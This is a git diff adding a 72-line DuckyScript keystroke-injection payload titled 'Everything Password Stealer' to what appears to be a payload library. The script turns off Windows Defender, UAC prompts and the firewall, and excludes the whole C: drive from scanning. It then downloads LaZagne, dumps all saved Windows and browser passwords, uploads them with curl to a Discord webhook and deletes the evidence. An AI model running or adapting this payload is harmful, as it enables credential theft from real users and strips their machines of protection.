diff --git a/payloads/library/exfiltration/Everything-Password-Stealer/payload.txt b/payloads/library/exfiltration/Everything-Password-Stealer/payload.txt new file mode 100644 index 0000000..bc28fa1 --- /dev/null +++ b/payloads/library/exfiltration/Everything-Password-Stealer/payload.txt @@ -0,0 +1,72 @@ +REM Title: Everything Password Stealer +REM Description: Steals every password in every windows 10 or 11 passwords with LaZagne +REM Bypasses UAC, Firewall, and Defender with persistence whatsoever +REM Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual) +REM Author: DeadPool (just kidding, created by me, the one and only Spade) + +GUI m +DELAY 2000 +REM Open Windows Defender Settings +CTRL ESC +DELAY 750 +STRING windows security +ENTER +DELAY 1500 +ENTER +REM Navigate to Manage Settings +DELAY 500 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +ENTER +DELAY 500 +REM Open and turn off Realtime Protection +SPACE +DELAY 1000 +ALT y +DELAY 1000 +REM Exit security settings +ALT F4 +DELAY 3000 +GUI r +DELAY 1000 +REM Open the Powershell as Administrator +STRING powershell +CTRL-SHIFT ENTER +DELAY 2000 +ALT y +ENTER +DELAY 1000 +REM Disabling the UAC +STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 +ENTER +DELAY 1000 +REM Disabling the Firewall Part 1 +STRING Set-MpPreference -DisableRealtimeMonitoring $true +ENTER +DELAY 1000 +REM Disabling the Firewall Part 2 +STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False +ENTER +DELAY 1000 +REM Disabling the Virus and Threat Protection +STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force +ENTER +DELAY 1000 +STRING Add-MpPreference -ExclusionPath "C:" +ENTER +DELAY 3000 +STRING $Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination "$Test/l.exe"; cd $Test +ENTER +DELAY 15000 +STRING .\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"; curl.exe [DISCORD WEBHOOK URL] -F "file1=@$Test/$env:computername.txt"; Remove-Item "$x/$env:computername.txt", "$x/l.exe" -Force -ErrorAction SilentlyContinue +ENTER +STRING exit +ENTER + +REM Done